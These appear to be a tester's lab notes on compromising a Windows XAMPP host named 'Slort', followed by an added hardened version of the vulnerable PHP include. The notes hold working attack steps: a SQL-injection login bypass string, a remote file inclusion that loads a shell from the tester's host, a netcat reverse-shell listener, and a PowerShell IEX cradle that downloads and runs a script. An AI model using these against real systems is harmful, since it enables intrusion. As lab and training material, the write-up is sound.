4 :4443 xampp

http://192.168.105.53:4443/dashboard/
XAMPP Splash Landing page

http://192.168.105.53:4443/dashboard/phpinfo.php
PHP Version 7.4.6
System 	Windows NT SLORT 10.0 build 18363 (Windows 10) AMD64
Architecture 	x64 

$ gobuster dir -u http://192.168.105.53:4443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:00 Starting gobuster in directory enumeration mode
===============================================================
/site                 (Status: 301) [Size: 346] [--> http://192.168.105.53:4443/site/]
/Index.php            (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/applications.html    (Status: 200) [Size: 3607]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/img                  (Status: 301) [Size: 345] [--> http://192.168.105.53:4443/img/]
/examples             (Status: 503) [Size: 1060]

http://192.168.105.53:4443/site/index.php?page=main.php
Slort

$ gobuster dir -u http://192.168.105.53:4443/site -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:57 Starting gobuster in directory enumeration mode
===============================================================
/services.php         (Status: 200) [Size: 11819]
/contact.php          (Status: 200) [Size: 8984]
/main.php             (Status: 200) [Size: 12541]
/Images               (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/Images/]
/about.php            (Status: 200) [Size: 15439]
/index.php            (Status: 301) [Size: 27] [--> index.php?page=main.php]
/css                  (Status: 301) [Size: 350] [--> http://192.168.105.53:4443/site/css/]
/About.php            (Status: 200) [Size: 15439]
/Contact.php          (Status: 200) [Size: 8984]
/Index.php            (Status: 301) [Size: 27] [--> index.php?page=main.php]
/license.txt          (Status: 200) [Size: 17128]
/portfolio.php        (Status: 200) [Size: 11865]
/js                   (Status: 301) [Size: 349] [--> http://192.168.105.53:4443/site/js/]
/README.txt           (Status: 200) [Size: 781]
/Services.php         (Status: 200) [Size: 11819]
/images               (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/images/]
/readme.txt           (Status: 200) [Size: 781]


http://192.168.105.53:4443/site/index.php?page='
Warning: include('): failed to open stream: No such file or directory in C:\xampp\htdocs\site\index.php on line 4
Warning: include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\site\index.php on line 4

[+] use payload : user & pass :  '=' 'OR'

# not sure how to make LFI work
# trying RFI
# works

http://192.168.105.53:4443/site/index.php?page=http://192.168.49.105/shell.php
$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.53] 49835
SOCKET: Shell has connected! PID: 2996
Microsoft Windows [Version 10.0.18363.900]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\site>whoami
slort\rupert

# PS shell using powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.105/rev.ps1')
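
Added example, not part of the original notes: a hardened form of the include on line 4 of site/index.php that the warnings above point to. It assumes the original line passes $_GET['page'] straight to include(); the page names come from the /site gobuster results, and resolve_page() is a hypothetical helper.

```php
<?php
// Assumption: line 4 of C:\xampp\htdocs\site\index.php is equivalent to
//   include($_GET['page']);
// Remote inclusion only succeeds when php.ini has allow_url_include = On,
// so set allow_url_include = Off, and display_errors = Off so that
// include() warnings stop disclosing filesystem paths.

// Allow-list: the request value is only ever used as a lookup key.
// User input is never concatenated into the path given to include().
const PAGES = [
    'main.php'      => 'main.php',
    'about.php'     => 'about.php',
    'services.php'  => 'services.php',
    'portfolio.php' => 'portfolio.php',
    'contact.php'   => 'contact.php',
];

function resolve_page($requested): ?string
{
    // Reject arrays (?page[]=x) and any other non-string input.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key match: URL wrappers (http://, php://), traversal sequences
    // and unknown names all fall through to null.
    return PAGES[$requested] ?? null;
}

$target = resolve_page($_GET['page'] ?? 'main.php');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}

// Path is built from a constant directory plus an allow-listed file name.
include __DIR__ . DIRECTORY_SEPARATOR . $target;
```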
